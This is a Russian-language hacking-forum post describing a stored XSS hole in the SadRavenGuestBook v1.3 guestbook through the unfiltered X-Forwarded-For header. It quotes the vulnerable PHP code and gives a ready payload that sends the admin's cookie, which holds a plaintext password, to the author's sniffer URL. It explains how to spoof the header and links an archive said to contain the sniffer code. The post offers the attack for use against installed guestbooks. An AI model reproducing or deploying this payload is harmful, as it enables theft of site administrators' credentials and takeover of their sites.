Форум АНТИЧАТ - active XSS SadRavenGuestBook v1.3

Недавно ред саратов писал об дырке в этой же буке связанной с файлом пароля, где он хранится в зашифрованном виде, в версии 1.3 эту багу пофиксили, но пароль в куках хранят в открытом виде, значит нам нужна иксс атака)
ошибка заключается в отсутствии фильтрации поля: TTP_X_FORWARDED_FOR
в 103-107 строчках файла index.php

PHP код:


		
			
if(empty($ip)):

        if (getenv('HTTP_X_FORWARDED_FOR')) { $ip=getenv('HTTP_X_FORWARDED_FOR'); }

        else { $ip=getenv('REMOTE_ADDR');}

endif;

мы же можем изменить это поле как угодно! например юзая Mozilla Firefox и плагин ModifyHeaders.
меняем поле TTP_X_FORWARDED_FOR на:

Код HTML:

67.22.83.13><script>img = new Image();img.src = "http://test1.ru/s.php?out="+document.cookie;</script><!-- XSS --

где айпи - отображаемый админу (фальшивый) ну а http://test1.ru/s.php - адрес нашего снифера.
теперь, запостив мессагу с таким TTP_X_FORWARDED_FOR, будем ждать, пока админ не зайдет в админку, и нам на снифер не утекут его куки с ОТКРЫТЫМ(!) паролем.

Следуя пословице лучше 1 раз увидеть, чем 100 раз услышать, ну или 10 раз прочитать, качаем видео (800кб):
http://slil.ru/24013333
В архиве с видео лежит код снифера и более подробный анализ баги.
ЗЫ: плиз, поместите видео на video.antichat.ru :)))
ЗЫЫ: помоему это статья, т.к. есть анализ дырки, а не просто соль) но если модеры так не считают, перенесите плиз в более подходящий раздел.